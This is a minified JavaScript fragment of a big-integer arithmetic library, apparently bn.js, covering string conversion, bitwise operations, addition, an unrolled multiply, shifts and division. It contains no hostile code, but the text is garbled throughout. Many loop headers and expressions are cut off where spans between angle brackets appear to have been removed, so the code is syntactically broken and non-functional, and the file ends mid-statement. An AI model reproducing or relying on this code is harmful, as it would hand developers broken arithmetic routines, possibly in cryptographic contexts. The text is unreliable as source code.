b=["","0","00","000","0000","00000","000000","0000000","00000000","000000000","0000000000","00000000000","000000000000","0000000000000","00000000000000","000000000000000","0000000000000000","00000000000000000","000000000000000000","0000000000000000000","00000000000000000000","000000000000000000000","0000000000000000000000","00000000000000000000000","000000000000000000000000","0000000000000000000000000"],_=[0,0,25,16,12,11,10,9,8,8,7,7,7,7,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5],y=[0,0,33554432,43046721,16777216,48828125,60466176,40353607,16777216,43046721,1e7,19487171,35831808,62748517,7529536,11390625,16777216,24137569,34012224,47045881,64e6,4084101,5153632,6436343,7962624,9765625,11881376,14348907,17210368,20511149,243e5,28629151,33554432,39135393,45435424,52521875,60466176];function p(z,l,f){f.negative=l.negative^z.negative;var v=z.length+l.length|0;f.length=v,v=v-1|0;var M=0|z.words[0],P=0|l.words[0],G=M*P,L=G/67108864|0;f.words[0]=67108863&G;for(var h=1;h>>26,J=67108863&L,Z=Math.min(h,l.length-1),ue=Math.max(0,h-z.length+1);ue<=Z;ue++)R+=(G=(M=0|z.words[h-ue|0])*(P=0|l.words[ue])+J)/67108864|0,J=67108863&G;f.words[h]=0|J,L=0|R}return 0!==L?f.words[h]=0|L:f.length--,f.strip()}I.prototype.toString=function(l,f){var v;if(f=0|f||1,16===(l=l||10)||"hex"===l){v="";for(var M=0,P=0,G=0;G>>24-M&16777215)||G!==this.length-1?b[6-L.length]+L+v:L+v,(M+=2)>=26&&(M-=26,G--)}for(0!==P&&(v=P.toString(16)+v);v.length%f!=0;)v="0"+v;return 0!==this.negative&&(v="-"+v),v}if(l===(0|l)&&l>=2&&l<=36){var h=_[l],R=y[l];v="";var J=this.clone();for(J.negative=0;!J.isZero();){var Z=J.modn(R).toString(l);v=(J=J.idivn(R)).isZero()?Z+v:b[h-Z.length]+Z+v}for(this.isZero()&&(v="0"+v);v.length%f!=0;)v="0"+v;return 0!==this.negative&&(v="-"+v),v}Q(!1,"Base should be between 2 and 36")},I.prototype.toNumber=function(){var l=this.words[0];return 2===this.length?l+=67108864*this.words[1]:3===this.length&&1===this.words[2]?l+=4503599627370496+67108864*this.words[1]:this.length>2&&Q(!1,"Number can only safely store up to 53 bits"),0!==this.negative?-l:l},I.prototype.toJSON=function(){return this.toString(16)},I.prototype.toBuffer=function(l,f){return Q(void 0!==$),this.toArrayLike($,l,f)},I.prototype.toArray=function(l,f){return this.toArrayLike(Array,l,f)},I.prototype.toArrayLike=function(l,f,v){var M=this.byteLength(),P=v||Math.max(1,M);Q(M<=P,"byte array longer than desired length"),Q(P>0,"Requested array length <= 0"),this.strip();var L,h,G="le"===f,X=new l(P),R=this.clone();if(G){for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[h]=L;for(;h=4096&&(v+=13,f>>>=13),f>=64&&(v+=7,f>>>=7),f>=8&&(v+=4,f>>>=4),f>=2&&(v+=2,f>>>=2),v+f},I.prototype._zeroBits=function(l){if(0===l)return 26;var f=l,v=0;return 0==(8191&f)&&(v+=13,f>>>=13),0==(127&f)&&(v+=7,f>>>=7),0==(15&f)&&(v+=4,f>>>=4),0==(3&f)&&(v+=2,f>>>=2),0==(1&f)&&v++,v},I.prototype.bitLength=function(){var f=this._countBits(this.words[this.length-1]);return 26*(this.length-1)+f},I.prototype.zeroBits=function(){if(this.isZero())return 0;for(var l=0,f=0;fl.length?this.clone().ior(l):l.clone().ior(this)},I.prototype.uor=function(l){return this.length>l.length?this.clone().iuor(l):l.clone().iuor(this)},I.prototype.iuand=function(l){var f;f=this.length>l.length?l:this;for(var v=0;vl.length?this.clone().iand(l):l.clone().iand(this)},I.prototype.uand=function(l){return this.length>l.length?this.clone().iuand(l):l.clone().iuand(this)},I.prototype.iuxor=function(l){var f,v;this.length>l.length?(f=this,v=l):(f=l,v=this);for(var M=0;Ml.length?this.clone().ixor(l):l.clone().ixor(this)},I.prototype.uxor=function(l){return this.length>l.length?this.clone().iuxor(l):l.clone().iuxor(this)},I.prototype.inotn=function(l){Q("number"==typeof l&&l>=0);var f=0|Math.ceil(l/26),v=l%26;this._expand(f),v>0&&f--;for(var M=0;M0&&(this.words[M]=~this.words[M]&67108863>>26-v),this.strip()},I.prototype.notn=function(l){return this.clone().inotn(l)},I.prototype.setn=function(l,f){Q("number"==typeof l&&l>=0);var v=l/26|0,M=l%26;return this._expand(v+1),this.words[v]=f?this.words[v]|1<l.length?(v=this,M=l):(v=l,M=this);for(var P=0,G=0;G>>26;for(;0!==P&&G>>26;if(this.length=v.length,0!==P)this.words[this.length]=P,this.length++;else if(v!==this)for(;Gl.length?this.clone().iadd(l):l.clone().iadd(this)},I.prototype.isub=function(l){if(0!==l.negative){l.negative=0;var f=this.iadd(l);return l.negative=1,f._normSign()}if(0!==this.negative)return this.negative=0,this.iadd(l),this.negative=1,this._normSign();var M,P,v=this.cmp(l);if(0===v)return this.negative=0,this.length=1,this.words[0]=0,this;v>0?(M=this,P=l):(M=l,P=this);for(var G=0,X=0;X>26,this.words[X]=67108863&f;for(;0!==G&&X>26,this.words[X]=67108863&f;if(0===G&&X>>13,Ie=0|M[1],Ae=8191&Ie,Ue=Ie>>>13,Xe=0|M[2],He=8191&Xe,Be=Xe>>>13,qe=0|M[3],De=8191&qe,Ve=qe>>>13,ze=0|M[4],me=8191&ze,Ke=ze>>>13,rt=0|M[5],Ge=8191&rt,Qe=rt>>>13,ht=0|M[6],mt=8191&ht,lt=ht>>>13,ft=0|M[7],xe=8191&ft,We=ft>>>13,Je=0|M[8],Oe=8191&Je,Te=Je>>>13,Le=0|M[9],$e=8191&Le,st=Le>>>13,xt=0|P[0],pt=8191&xt,vt=xt>>>13,Wi=0|P[1],Ft=8191&Wi,zt=Wi>>>13,pa=0|P[2],Jt=8191&pa,Gt=pa>>>13,Co=0|P[3],jt=8191&Co,qt=Co>>>13,Qn=0|P[4],Kt=8191&Qn,Zt=Qn>>>13,Bo=0|P[5],ti=8191&Bo,ii=Bo>>>13,pn=0|P[6],Pt=8191&pn,Xt=pn>>>13,Ho=0|P[7],Qt=8191&Ho,ei=Ho>>>13,$o=0|P[8],ai=8191&$o,$t=$o>>>13,zo=0|P[9],Ut=8191&zo,Yt=zo>>>13;v.negative=l.negative^f.negative,v.length=19;var ha=(X+(L=Math.imul(Z,pt))|0)+((8191&(h=(h=Math.imul(Z,vt))+Math.imul(ue,pt)|0))<<13)|0;X=((R=Math.imul(ue,vt))+(h>>>13)|0)+(ha>>>26)|0,ha&=67108863,L=Math.imul(Ae,pt),h=(h=Math.imul(Ae,vt))+Math.imul(Ue,pt)|0,R=Math.imul(Ue,vt);var Ha=(X+(L=L+Math.imul(Z,Ft)|0)|0)+((8191&(h=(h=h+Math.imul(Z,zt)|0)+Math.imul(ue,Ft)|0))<<13)|0;X=((R=R+Math.imul(ue,zt)|0)+(h>>>13)|0)+(Ha>>>26)|0,Ha&=67108863,L=Math.imul(He,pt),h=(h=Math.imul(He,vt))+Math.imul(Be,pt)|0,R=Math.imul(Be,vt),L=L+Math.imul(Ae,Ft)|0,h=(h=h+Math.imul(Ae,zt)|0)+Math.imul(Ue,Ft)|0,R=R+Math.imul(Ue,zt)|0;var Va=(X+(L=L+Math.imul(Z,Jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Gt)|0)+Math.imul(ue,Jt)|0))<<13)|0;X=((R=R+Math.imul(ue,Gt)|0)+(h>>>13)|0)+(Va>>>26)|0,Va&=67108863,L=Math.imul(De,pt),h=(h=Math.imul(De,vt))+Math.imul(Ve,pt)|0,R=Math.imul(Ve,vt),L=L+Math.imul(He,Ft)|0,h=(h=h+Math.imul(He,zt)|0)+Math.imul(Be,Ft)|0,R=R+Math.imul(Be,zt)|0,L=L+Math.imul(Ae,Jt)|0,h=(h=h+Math.imul(Ae,Gt)|0)+Math.imul(Ue,Jt)|0,R=R+Math.imul(Ue,Gt)|0;var co=(X+(L=L+Math.imul(Z,jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,qt)|0)+Math.imul(ue,jt)|0))<<13)|0;X=((R=R+Math.imul(ue,qt)|0)+(h>>>13)|0)+(co>>>26)|0,co&=67108863,L=Math.imul(me,pt),h=(h=Math.imul(me,vt))+Math.imul(Ke,pt)|0,R=Math.imul(Ke,vt),L=L+Math.imul(De,Ft)|0,h=(h=h+Math.imul(De,zt)|0)+Math.imul(Ve,Ft)|0,R=R+Math.imul(Ve,zt)|0,L=L+Math.imul(He,Jt)|0,h=(h=h+Math.imul(He,Gt)|0)+Math.imul(Be,Jt)|0,R=R+Math.imul(Be,Gt)|0,L=L+Math.imul(Ae,jt)|0,h=(h=h+Math.imul(Ae,qt)|0)+Math.imul(Ue,jt)|0,R=R+Math.imul(Ue,qt)|0;var io=(X+(L=L+Math.imul(Z,Kt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Zt)|0)+Math.imul(ue,Kt)|0))<<13)|0;X=((R=R+Math.imul(ue,Zt)|0)+(h>>>13)|0)+(io>>>26)|0,io&=67108863,L=Math.imul(Ge,pt),h=(h=Math.imul(Ge,vt))+Math.imul(Qe,pt)|0,R=Math.imul(Qe,vt),L=L+Math.imul(me,Ft)|0,h=(h=h+Math.imul(me,zt)|0)+Math.imul(Ke,Ft)|0,R=R+Math.imul(Ke,zt)|0,L=L+Math.imul(De,Jt)|0,h=(h=h+Math.imul(De,Gt)|0)+Math.imul(Ve,Jt)|0,R=R+Math.imul(Ve,Gt)|0,L=L+Math.imul(He,jt)|0,h=(h=h+Math.imul(He,qt)|0)+Math.imul(Be,jt)|0,R=R+Math.imul(Be,qt)|0,L=L+Math.imul(Ae,Kt)|0,h=(h=h+Math.imul(Ae,Zt)|0)+Math.imul(Ue,Kt)|0,R=R+Math.imul(Ue,Zt)|0;var yo=(X+(L=L+Math.imul(Z,ti)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ii)|0)+Math.imul(ue,ti)|0))<<13)|0;X=((R=R+Math.imul(ue,ii)|0)+(h>>>13)|0)+(yo>>>26)|0,yo&=67108863,L=Math.imul(mt,pt),h=(h=Math.imul(mt,vt))+Math.imul(lt,pt)|0,R=Math.imul(lt,vt),L=L+Math.imul(Ge,Ft)|0,h=(h=h+Math.imul(Ge,zt)|0)+Math.imul(Qe,Ft)|0,R=R+Math.imul(Qe,zt)|0,L=L+Math.imul(me,Jt)|0,h=(h=h+Math.imul(me,Gt)|0)+Math.imul(Ke,Jt)|0,R=R+Math.imul(Ke,Gt)|0,L=L+Math.imul(De,jt)|0,h=(h=h+Math.imul(De,qt)|0)+Math.imul(Ve,jt)|0,R=R+Math.imul(Ve,qt)|0,L=L+Math.imul(He,Kt)|0,h=(h=h+Math.imul(He,Zt)|0)+Math.imul(Be,Kt)|0,R=R+Math.imul(Be,Zt)|0,L=L+Math.imul(Ae,ti)|0,h=(h=h+Math.imul(Ae,ii)|0)+Math.imul(Ue,ti)|0,R=R+Math.imul(Ue,ii)|0;var Vn=(X+(L=L+Math.imul(Z,Pt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Xt)|0)+Math.imul(ue,Pt)|0))<<13)|0;X=((R=R+Math.imul(ue,Xt)|0)+(h>>>13)|0)+(Vn>>>26)|0,Vn&=67108863,L=Math.imul(xe,pt),h=(h=Math.imul(xe,vt))+Math.imul(We,pt)|0,R=Math.imul(We,vt),L=L+Math.imul(mt,Ft)|0,h=(h=h+Math.imul(mt,zt)|0)+Math.imul(lt,Ft)|0,R=R+Math.imul(lt,zt)|0,L=L+Math.imul(Ge,Jt)|0,h=(h=h+Math.imul(Ge,Gt)|0)+Math.imul(Qe,Jt)|0,R=R+Math.imul(Qe,Gt)|0,L=L+Math.imul(me,jt)|0,h=(h=h+Math.imul(me,qt)|0)+Math.imul(Ke,jt)|0,R=R+Math.imul(Ke,qt)|0,L=L+Math.imul(De,Kt)|0,h=(h=h+Math.imul(De,Zt)|0)+Math.imul(Ve,Kt)|0,R=R+Math.imul(Ve,Zt)|0,L=L+Math.imul(He,ti)|0,h=(h=h+Math.imul(He,ii)|0)+Math.imul(Be,ti)|0,R=R+Math.imul(Be,ii)|0,L=L+Math.imul(Ae,Pt)|0,h=(h=h+Math.imul(Ae,Xt)|0)+Math.imul(Ue,Pt)|0,R=R+Math.imul(Ue,Xt)|0;var Eo=(X+(L=L+Math.imul(Z,Qt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ei)|0)+Math.imul(ue,Qt)|0))<<13)|0;X=((R=R+Math.imul(ue,ei)|0)+(h>>>13)|0)+(Eo>>>26)|0,Eo&=67108863,L=Math.imul(Oe,pt),h=(h=Math.imul(Oe,vt))+Math.imul(Te,pt)|0,R=Math.imul(Te,vt),L=L+Math.imul(xe,Ft)|0,h=(h=h+Math.imul(xe,zt)|0)+Math.imul(We,Ft)|0,R=R+Math.imul(We,zt)|0,L=L+Math.imul(mt,Jt)|0,h=(h=h+Math.imul(mt,Gt)|0)+Math.imul(lt,Jt)|0,R=R+Math.imul(lt,Gt)|0,L=L+Math.imul(Ge,jt)|0,h=(h=h+Math.imul(Ge,qt)|0)+Math.imul(Qe,jt)|0,R=R+Math.imul(Qe,qt)|0,L=L+Math.imul(me,Kt)|0,h=(h=h+Math.imul(me,Zt)|0)+Math.imul(Ke,Kt)|0,R=R+Math.imul(Ke,Zt)|0,L=L+Math.imul(De,ti)|0,h=(h=h+Math.imul(De,ii)|0)+Math.imul(Ve,ti)|0,R=R+Math.imul(Ve,ii)|0,L=L+Math.imul(He,Pt)|0,h=(h=h+Math.imul(He,Xt)|0)+Math.imul(Be,Pt)|0,R=R+Math.imul(Be,Xt)|0,L=L+Math.imul(Ae,Qt)|0,h=(h=h+Math.imul(Ae,ei)|0)+Math.imul(Ue,Qt)|0,R=R+Math.imul(Ue,ei)|0;var Pn=(X+(L=L+Math.imul(Z,ai)|0)|0)+((8191&(h=(h=h+Math.imul(Z,$t)|0)+Math.imul(ue,ai)|0))<<13)|0;X=((R=R+Math.imul(ue,$t)|0)+(h>>>13)|0)+(Pn>>>26)|0,Pn&=67108863,L=Math.imul($e,pt),h=(h=Math.imul($e,vt))+Math.imul(st,pt)|0,R=Math.imul(st,vt),L=L+Math.imul(Oe,Ft)|0,h=(h=h+Math.imul(Oe,zt)|0)+Math.imul(Te,Ft)|0,R=R+Math.imul(Te,zt)|0,L=L+Math.imul(xe,Jt)|0,h=(h=h+Math.imul(xe,Gt)|0)+Math.imul(We,Jt)|0,R=R+Math.imul(We,Gt)|0,L=L+Math.imul(mt,jt)|0,h=(h=h+Math.imul(mt,qt)|0)+Math.imul(lt,jt)|0,R=R+Math.imul(lt,qt)|0,L=L+Math.imul(Ge,Kt)|0,h=(h=h+Math.imul(Ge,Zt)|0)+Math.imul(Qe,Kt)|0,R=R+Math.imul(Qe,Zt)|0,L=L+Math.imul(me,ti)|0,h=(h=h+Math.imul(me,ii)|0)+Math.imul(Ke,ti)|0,R=R+Math.imul(Ke,ii)|0,L=L+Math.imul(De,Pt)|0,h=(h=h+Math.imul(De,Xt)|0)+Math.imul(Ve,Pt)|0,R=R+Math.imul(Ve,Xt)|0,L=L+Math.imul(He,Qt)|0,h=(h=h+Math.imul(He,ei)|0)+Math.imul(Be,Qt)|0,R=R+Math.imul(Be,ei)|0,L=L+Math.imul(Ae,ai)|0,h=(h=h+Math.imul(Ae,$t)|0)+Math.imul(Ue,ai)|0,R=R+Math.imul(Ue,$t)|0;var lo=(X+(L=L+Math.imul(Z,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Yt)|0)+Math.imul(ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(ue,Yt)|0)+(h>>>13)|0)+(lo>>>26)|0,lo&=67108863,L=Math.imul($e,Ft),h=(h=Math.imul($e,zt))+Math.imul(st,Ft)|0,R=Math.imul(st,zt),L=L+Math.imul(Oe,Jt)|0,h=(h=h+Math.imul(Oe,Gt)|0)+Math.imul(Te,Jt)|0,R=R+Math.imul(Te,Gt)|0,L=L+Math.imul(xe,jt)|0,h=(h=h+Math.imul(xe,qt)|0)+Math.imul(We,jt)|0,R=R+Math.imul(We,qt)|0,L=L+Math.imul(mt,Kt)|0,h=(h=h+Math.imul(mt,Zt)|0)+Math.imul(lt,Kt)|0,R=R+Math.imul(lt,Zt)|0,L=L+Math.imul(Ge,ti)|0,h=(h=h+Math.imul(Ge,ii)|0)+Math.imul(Qe,ti)|0,R=R+Math.imul(Qe,ii)|0,L=L+Math.imul(me,Pt)|0,h=(h=h+Math.imul(me,Xt)|0)+Math.imul(Ke,Pt)|0,R=R+Math.imul(Ke,Xt)|0,L=L+Math.imul(De,Qt)|0,h=(h=h+Math.imul(De,ei)|0)+Math.imul(Ve,Qt)|0,R=R+Math.imul(Ve,ei)|0,L=L+Math.imul(He,ai)|0,h=(h=h+Math.imul(He,$t)|0)+Math.imul(Be,ai)|0,R=R+Math.imul(Be,$t)|0;var ao=(X+(L=L+Math.imul(Ae,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ae,Yt)|0)+Math.imul(Ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ue,Yt)|0)+(h>>>13)|0)+(ao>>>26)|0,ao&=67108863,L=Math.imul($e,Jt),h=(h=Math.imul($e,Gt))+Math.imul(st,Jt)|0,R=Math.imul(st,Gt),L=L+Math.imul(Oe,jt)|0,h=(h=h+Math.imul(Oe,qt)|0)+Math.imul(Te,jt)|0,R=R+Math.imul(Te,qt)|0,L=L+Math.imul(xe,Kt)|0,h=(h=h+Math.imul(xe,Zt)|0)+Math.imul(We,Kt)|0,R=R+Math.imul(We,Zt)|0,L=L+Math.imul(mt,ti)|0,h=(h=h+Math.imul(mt,ii)|0)+Math.imul(lt,ti)|0,R=R+Math.imul(lt,ii)|0,L=L+Math.imul(Ge,Pt)|0,h=(h=h+Math.imul(Ge,Xt)|0)+Math.imul(Qe,Pt)|0,R=R+Math.imul(Qe,Xt)|0,L=L+Math.imul(me,Qt)|0,h=(h=h+Math.imul(me,ei)|0)+Math.imul(Ke,Qt)|0,R=R+Math.imul(Ke,ei)|0,L=L+Math.imul(De,ai)|0,h=(h=h+Math.imul(De,$t)|0)+Math.imul(Ve,ai)|0,R=R+Math.imul(Ve,$t)|0;var bo=(X+(L=L+Math.imul(He,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(He,Yt)|0)+Math.imul(Be,Ut)|0))<<13)|0;X=((R=R+Math.imul(Be,Yt)|0)+(h>>>13)|0)+(bo>>>26)|0,bo&=67108863,L=Math.imul($e,jt),h=(h=Math.imul($e,qt))+Math.imul(st,jt)|0,R=Math.imul(st,qt),L=L+Math.imul(Oe,Kt)|0,h=(h=h+Math.imul(Oe,Zt)|0)+Math.imul(Te,Kt)|0,R=R+Math.imul(Te,Zt)|0,L=L+Math.imul(xe,ti)|0,h=(h=h+Math.imul(xe,ii)|0)+Math.imul(We,ti)|0,R=R+Math.imul(We,ii)|0,L=L+Math.imul(mt,Pt)|0,h=(h=h+Math.imul(mt,Xt)|0)+Math.imul(lt,Pt)|0,R=R+Math.imul(lt,Xt)|0,L=L+Math.imul(Ge,Qt)|0,h=(h=h+Math.imul(Ge,ei)|0)+Math.imul(Qe,Qt)|0,R=R+Math.imul(Qe,ei)|0,L=L+Math.imul(me,ai)|0,h=(h=h+Math.imul(me,$t)|0)+Math.imul(Ke,ai)|0,R=R+Math.imul(Ke,$t)|0;var $n=(X+(L=L+Math.imul(De,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(De,Yt)|0)+Math.imul(Ve,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ve,Yt)|0)+(h>>>13)|0)+($n>>>26)|0,$n&=67108863,L=Math.imul($e,Kt),h=(h=Math.imul($e,Zt))+Math.imul(st,Kt)|0,R=Math.imul(st,Zt),L=L+Math.imul(Oe,ti)|0,h=(h=h+Math.imul(Oe,ii)|0)+Math.imul(Te,ti)|0,R=R+Math.imul(Te,ii)|0,L=L+Math.imul(xe,Pt)|0,h=(h=h+Math.imul(xe,Xt)|0)+Math.imul(We,Pt)|0,R=R+Math.imul(We,Xt)|0,L=L+Math.imul(mt,Qt)|0,h=(h=h+Math.imul(mt,ei)|0)+Math.imul(lt,Qt)|0,R=R+Math.imul(lt,ei)|0,L=L+Math.imul(Ge,ai)|0,h=(h=h+Math.imul(Ge,$t)|0)+Math.imul(Qe,ai)|0,R=R+Math.imul(Qe,$t)|0;var Do=(X+(L=L+Math.imul(me,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(me,Yt)|0)+Math.imul(Ke,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ke,Yt)|0)+(h>>>13)|0)+(Do>>>26)|0,Do&=67108863,L=Math.imul($e,ti),h=(h=Math.imul($e,ii))+Math.imul(st,ti)|0,R=Math.imul(st,ii),L=L+Math.imul(Oe,Pt)|0,h=(h=h+Math.imul(Oe,Xt)|0)+Math.imul(Te,Pt)|0,R=R+Math.imul(Te,Xt)|0,L=L+Math.imul(xe,Qt)|0,h=(h=h+Math.imul(xe,ei)|0)+Math.imul(We,Qt)|0,R=R+Math.imul(We,ei)|0,L=L+Math.imul(mt,ai)|0,h=(h=h+Math.imul(mt,$t)|0)+Math.imul(lt,ai)|0,R=R+Math.imul(lt,$t)|0;var Mo=(X+(L=L+Math.imul(Ge,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ge,Yt)|0)+Math.imul(Qe,Ut)|0))<<13)|0;X=((R=R+Math.imul(Qe,Yt)|0)+(h>>>13)|0)+(Mo>>>26)|0,Mo&=67108863,L=Math.imul($e,Pt),h=(h=Math.imul($e,Xt))+Math.imul(st,Pt)|0,R=Math.imul(st,Xt),L=L+Math.imul(Oe,Qt)|0,h=(h=h+Math.imul(Oe,ei)|0)+Math.imul(Te,Qt)|0,R=R+Math.imul(Te,ei)|0,L=L+Math.imul(xe,ai)|0,h=(h=h+Math.imul(xe,$t)|0)+Math.imul(We,ai)|0,R=R+Math.imul(We,$t)|0;var no=(X+(L=L+Math.imul(mt,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(mt,Yt)|0)+Math.imul(lt,Ut)|0))<<13)|0;X=((R=R+Math.imul(lt,Yt)|0)+(h>>>13)|0)+(no>>>26)|0,no&=67108863,L=Math.imul($e,Qt),h=(h=Math.imul($e,ei))+Math.imul(st,Qt)|0,R=Math.imul(st,ei),L=L+Math.imul(Oe,ai)|0,h=(h=h+Math.imul(Oe,$t)|0)+Math.imul(Te,ai)|0,R=R+Math.imul(Te,$t)|0;var Kn=(X+(L=L+Math.imul(xe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(xe,Yt)|0)+Math.imul(We,Ut)|0))<<13)|0;X=((R=R+Math.imul(We,Yt)|0)+(h>>>13)|0)+(Kn>>>26)|0,Kn&=67108863,L=Math.imul($e,ai),h=(h=Math.imul($e,$t))+Math.imul(st,ai)|0,R=Math.imul(st,$t);var Sa=(X+(L=L+Math.imul(Oe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Oe,Yt)|0)+Math.imul(Te,Ut)|0))<<13)|0;X=((R=R+Math.imul(Te,Yt)|0)+(h>>>13)|0)+(Sa>>>26)|0,Sa&=67108863;var ra=(X+(L=Math.imul($e,Ut))|0)+((8191&(h=(h=Math.imul($e,Yt))+Math.imul(st,Ut)|0))<<13)|0;return X=((R=Math.imul(st,Yt))+(h>>>13)|0)+(ra>>>26)|0,ra&=67108863,G[0]=ha,G[1]=Ha,G[2]=Va,G[3]=co,G[4]=io,G[5]=yo,G[6]=Vn,G[7]=Eo,G[8]=Pn,G[9]=lo,G[10]=ao,G[11]=bo,G[12]=$n,G[13]=Do,G[14]=Mo,G[15]=no,G[16]=Kn,G[17]=Sa,G[18]=ra,0!==X&&(G[19]=X,v.length++),v};function x(z,l,f){return(new S).mulp(z,l,f)}function S(z,l){this.x=z,this.y=l}Math.imul||(D=p),I.prototype.mulTo=function(l,f){var v,M=this.length+l.length;return v=10===this.length&&10===l.length?D(this,l,f):M<63?p(this,l,f):M<1024?function w(z,l,f){f.negative=l.negative^z.negative,f.length=z.length+l.length;for(var v=0,M=0,P=0;P>>26)|0)>>>26,G&=67108863}f.words[P]=X,v=G,G=M}return 0!==v?f.words[P]=v:f.length--,f.strip()}(this,l,f):x(this,l,f),v},S.prototype.makeRBT=function(l){for(var f=new Array(l),v=I.prototype._countBits(l)-1,M=0;M>=1;return M},S.prototype.permute=function(l,f,v,M,P,G){for(var X=0;X>>=1)P++;return 1<>>=13),P>>>=13;for(G=2*f;G>=26,f+=M/67108864|0,f+=P>>>26,this.words[v]=67108863&P}return 0!==f&&(this.words[v]=f,this.length++),this},I.prototype.muln=function(l){return this.clone().imuln(l)},I.prototype.sqr=function(){return this.mul(this)},I.prototype.isqr=function(){return this.imul(this.clone())},I.prototype.pow=function(l){var f=function A(z){for(var l=new Array(z.bitLength()),f=0;f>>M}return l}(l);if(0===f.length)return new I(1);for(var v=this,M=0;M=0);var P,f=l%26,v=(l-f)/26,M=67108863>>>26-f<<26-f;if(0!==f){var G=0;for(P=0;P>>26-f}G&&(this.words[P]=G,this.length++)}if(0!==v){for(P=this.length-1;P>=0;P--)this.words[P+v]=this.words[P];for(P=0;P=0),M=f?(f-f%26)/26:0;var P=l%26,G=Math.min((l-P)/26,this.length),X=67108863^67108863>>>P<G)for(this.length-=G,h=0;h=0&&(0!==R||h>=M);h--){var J=0|this.words[h];this.words[h]=R<<26-P|J>>>P,R=J&X}return L&&0!==R&&(L.words[L.length++]=R),0===this.length&&(this.words[0]=0,this.length=1),this.strip()},I.prototype.ishrn=function(l,f,v){return Q(0===this.negative),this.iushrn(l,f,v)},I.prototype.shln=function(l){return this.clone().ishln(l)},I.prototype.ushln=function(l){return this.clone().iushln(l)},I.prototype.shrn=function(l){return this.clone().ishrn(l)},I.prototype.ushrn=function(l){return this.clone().iushrn(l)},I.prototype.testn=function(l){Q("number"==typeof l&&l>=0);var f=l%26,v=(l-f)/26;return!(this.length<=v||!(this.words[v]&1<=0);var f=l%26,v=(l-f)/26;return Q(0===this.negative,"imaskn works only with positive numbers"),this.length<=v?this:(0!==f&&v++,this.length=Math.min(v,this.length),0!==f&&(this.words[this.length-1]&=67108863^67108863>>>f<=67108864;f++)this.words[f]-=67108864,f===this.length-1?this.words[f+1]=1:this.words[f+1]++;return this.length=Math.max(this.length,f+1),this},I.prototype.isubn=function(l){if(Q("number"==typeof l),Q(l<67108864),l<0)return this.iaddn(-l);if(0!==this.negative)return this.negative=0,this.iaddn(l),this.negative=1,this;if(this.words[0]-=l,1===this.length&&this.words[0]<0)this.words[0]=-this.words[0],this.negative=1;else for(var f=0;f>26)-(L/67108864|0),this.words[P+v]=67108863&G}for(;P>26,this.words[P+v]=67108863&G;if(0===X)return this.strip();for(Q(-1===X),X=0,P=0;P>26,this.words[P]=67108863&G;return this.negative=1,this.strip()},I.prototype._wordDiv=function(l,f){var v,M=this.clone(),P=l,G=0|P.words[P.length-1];0!=(v=26-this._countBits(G))&&(P=P.ushln(v),M.iushln(v),G=0|P.words[P.length-1]);var h,L=M.length-P.length;if("mod"!==f){(h=new I(null)).length=L+1,h.words=new Array(h.length);for(var R=0;R=0;Z--){var ue=67108864*(0|M.words[P.length+Z])+(0|M.words[P.length+Z-1]);for(ue=Math.min(ue/G|0,67108863),M._ishlnsubmul(P,ue,Z);0!==M.negative;)ue--,M.negative=0,M._ishlnsubmul(P,1,Z),M.isZero()||(M.negative^=1);h&&(h.words[Z]=ue)}return h&&h.strip(),M.strip(),"div"!==f&&0!==v&&M.iushrn(v),{div:h||null,mod:M}},I.prototype.divmod=function(l,f,v){return Q(!l.isZero()),this.isZero()?{div:new I(0),mod:new I(0)}:0!==this.negative&&0===l.negative?(G=this.neg().divmod(l,f),"mod"!==f&&(M=G.div.neg()),"div"!==f&&(P=G.mod.neg(),v&&0!==P.negative&&P.iadd(l)),{div:M,mod:P}):0===this.negative&&0!==l.negative?(G=this.divmod(l.neg(),f),"mod"!==f&&(M=G.div.neg()),{div:M,mod:G.mod}):0!=(this.negative&l.negative)?(G=this.neg().divmod(l.neg(),f),"div"!==f&&(P=G.mod.neg(),v&&0!==P.negative&&P.isub(l)),{div:G.div,mod:P}):l.length>this.length||this.cmp(l)<0?{div:new I(0),mod:this}:1===l.length?"div"===f?{div:this.divn(l.words[0]),mod:null}:"mod"===f?{div:null,mod:new I(this.modn(l.words[0]))}:{div:this.divn(l.words[0]),mod:new I(this.modn(l.words[0]))}:this._wordDiv(l,f);var M,P,G},I.prototype.div=function(l){return this.divmod(l,"div",!1).div},I.prototype.mod=function(l){return this.divmod(l,"mod",!1).mod},I.prototype.umod=function(l){return this.divmod(l,"mod",!0).mod},I.prototype.divRound=function(l){var f=this.divmod(l);if(f.mod.isZero())return f.div;var v=0!==f.div.negative?f.mod.isub(l):f.mod,M=l.ushrn(1),P=l.andln(1),G=v.cmp(M);return G<0||1===P&&0===G?f.div:0!==f.div.negative?f.div.isubn(1):f.div.iaddn(1)},I.prototype.modn=function(l){Q(l<=67108863);for(var f=(1<<26)%l,v=0,M=this.length-1;M>=0;M--)v=(f*v+(0|this.words[M]))%l;return v},I.prototype.idivn=function(l){Q(l<=67108863);for(var f=0,v=this.length-1;v>=0;v--){var M=(0|this.words[v])+67108864*f;this.words[v]=M/l|0,f=M%l}return this.strip()},I.prototype.divn=function(l){return this.clone().idivn(l)},I.prototype.egcd=function(l){Q(0===l.negative),Q(!l.isZero());var f=this,v=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var M=new I(1),P=new I(0),G=new I(0),X=new I(1),L=0;f.isEven()&&v.isEven();)f.iushrn(1),v.iushrn(1),++L;for(var h=v.clone(),R=f.clone();!f.isZero();){for(var 